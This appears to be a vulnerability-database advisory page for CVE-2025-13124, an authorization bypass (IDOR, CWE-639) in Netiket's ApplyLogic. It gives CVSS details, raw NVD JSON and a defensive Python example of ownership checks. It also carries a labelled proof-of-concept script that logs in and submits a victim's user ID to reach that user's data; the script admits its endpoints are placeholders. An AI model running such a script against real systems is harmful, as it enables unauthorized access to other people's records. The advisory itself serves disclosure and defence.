Security Vulnerability Report
CVE-2025-13124 CVSS 7.6 HIGH

CVE-2025-13124

Published: 2025-12-11 15:15:47
Last Modified: 2026-04-15 00:35:42
NVD status: Deferred

Description

Authorization Bypass Through User-Controlled Key vulnerability in Netiket Information Technologies Ltd. Co. ApplyLogic allows Exploitation of Trusted Identifiers. This issue affects ApplyLogic: through 01.12.2025.

Weakness: CWE-639 (Authorization Bypass Through User-Controlled Key). In practice this is the IDOR pattern: the application takes an identifier from the request (a record, user or application key) and acts on it without checking that the authenticated session is allowed to touch that object. The vector's PR:L and I:H mean any low-privileged account can reach the flaw and that the impact is primarily on integrity, i.e. other users' data can be modified, not just read.
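The pattern behind CWE-639, as an added illustration that is not ApplyLogic code (its internals are not published on this page): a minimal record-access layer with the vulnerable lookup, the ownership-scoped fix, and a second mitigation using per-session indirect references. The record shape, field names, user names and IDs are constructed sample data.

```python
"""Added illustration of CWE-639 (not ApplyLogic code; record shape, users
and IDs are constructed sample data)."""
import secrets


class Forbidden(Exception):
    """Raised when the caller may not act on the requested record."""


# Constructed sample store: the key is a predictable, user-visible ID.
RECORDS = {
    101: {"owner": "alice", "status": "submitted", "id_no_last4": "1234"},
    102: {"owner": "bob", "status": "draft", "id_no_last4": "9876"},
}


def get_record_vulnerable(current_user: str, record_id: int) -> dict:
    """Vulnerable: the key comes straight from the request and is trusted.
    current_user (from the session) is never consulted, so any logged-in user
    reaches any record by changing record_id. Writes through the same path
    are what an I:H rating describes."""
    return RECORDS[record_id]


def get_record_fixed(current_user: str, record_id: int) -> dict:
    """Fixed: authorization is decided from the server-side identity. A record
    that is absent and one owned by someone else get the same answer, so the
    endpoint cannot be used to enumerate valid IDs."""
    record = RECORDS.get(record_id)
    if record is None or record["owner"] != current_user:
        raise Forbidden("record not found")
    return record


def set_status_fixed(current_user: str, record_id: int, new_status: str) -> dict:
    """Writes go through the same ownership gate as reads."""
    record = get_record_fixed(current_user, record_id)
    record["status"] = new_status
    return record


def denied(current_user: str, record_id: int) -> bool:
    """True when the fixed handler refuses the access."""
    try:
        get_record_fixed(current_user, record_id)
    except Forbidden:
        return True
    return False


class IndirectRefs:
    """Second mitigation: per-session indirect references. The client only
    sees unguessable tokens minted for the records it was shown, and a token
    from one session is meaningless in another."""

    def __init__(self) -> None:
        self._by_token: dict[str, int] = {}

    def expose(self, record_id: int) -> str:
        token = secrets.token_urlsafe(16)
        self._by_token[token] = record_id
        return token

    def resolve(self, token: str) -> int:
        if token not in self._by_token:
            raise Forbidden("unknown reference")
        return self._by_token[token]


def cross_session_token_rejected() -> bool:
    """A token minted in alice's session resolves there and nowhere else."""
    alice, bob = IndirectRefs(), IndirectRefs()
    token = alice.expose(101)
    try:
        bob.resolve(token)
    except Forbidden:
        return alice.resolve(token) == 101
    return False


if __name__ == "__main__":
    # bob reads alice's record through the vulnerable path...
    print("vulnerable:", get_record_vulnerable("bob", 101)["owner"])
    # ...and is refused by the fixed one while alice still gets through.
    print("fixed denies bob:", denied("bob", 101), "allows alice:", not denied("alice", 101))
    print("indirect refs isolate sessions:", cross_session_token_rejected())
```

The ownership check must live in the data-access layer, not in the UI or in a client-supplied field: if the server accepts a "user_id" or similar identifier from the request body and uses it to decide whose data to touch, the fix has simply moved the bug.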

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No CPE configuration data is present in the NVD record; the affected range below is taken from the description, where "through" is inclusive.

ApplyLogic through 01.12.2025 (inclusive; no fixed version is listed on this page)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13124 PoC - Authorization Bypass Through User-Controlled Key
# Affected: ApplyLogic through 01.12.2025
# Author: [email protected]
# Note: the endpoint paths, JSON field names and session format below are
# placeholders; the advisory referenced on this page publishes no request
# details, so they must be adapted to the real application.
import requests

TARGET_URL = "http://target.com/ApplyLogic"
ATTACKER_ID = "attacker_controlled_id"
TARGET_USER_ID = "victim_user_id"


def exploit_authorization_bypass():
    """
    Demonstrates the authorization bypass: an authenticated low-privilege
    user (PR:L) supplies identifiers of its own choosing and the server
    trusts them instead of checking ownership against the session.
    """
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0",
    }

    # Step 1: Normal login to obtain an initial session
    login_data = {
        "username": "[email protected]",
        "password": "attacker_password",
    }
    print("[*] Step 1: Authenticating as attacker...")
    login_response = requests.post(
        f"{TARGET_URL}/api/auth/login",
        json=login_data,
        headers=headers,
        timeout=10,
    )
    if login_response.status_code != 200:
        print("[-] Login failed")
        return False

    session = login_response.json().get("session_token")
    print(f"[+] Obtained session: {session}")

    # Step 2: Reuse the valid session but point the request at another
    # user's data through attacker-controlled keys
    exploit_data = {
        "user_id": TARGET_USER_ID,
        "session_token": session,
        "action": "access_sensitive_data",
        # Attacker-controlled key that the server trusts without an
        # ownership check
        "trusted_identifier": ATTACKER_ID,
    }
    print("[*] Step 2: Exploiting authorization bypass...")
    print(f"[*] Injecting trusted identifier: {ATTACKER_ID}")
    exploit_response = requests.post(
        f"{TARGET_URL}/api/resource/access",
        json=exploit_data,
        headers=headers,
        timeout=10,
    )

    if exploit_response.status_code == 200:
        print("[+] Authorization bypass successful!")
        print(f"[+] Response: {exploit_response.text}")
        return True

    print(f"[-] Exploit failed with status: {exploit_response.status_code}")
    return False


if __name__ == "__main__":
    exploit_authorization_bypass()
```

References

https://www.usom.gov.tr/bildirim/tr-25-0447 (USOM advisory TR-25-0447; the only reference in the NVD record)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13124",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-11T15:15:46.680",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Authorization Bypass Through User-Controlled Key vulnerability in Netiket Information Technologies Ltd. Co. ApplyLogic allows Exploitation of Trusted Identifiers.This issue affects ApplyLogic: through 01.12.2025."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.usom.gov.tr/bildirim/tr-25-0447",
        "source": "[email protected]"
      }
    ]
  }
}
```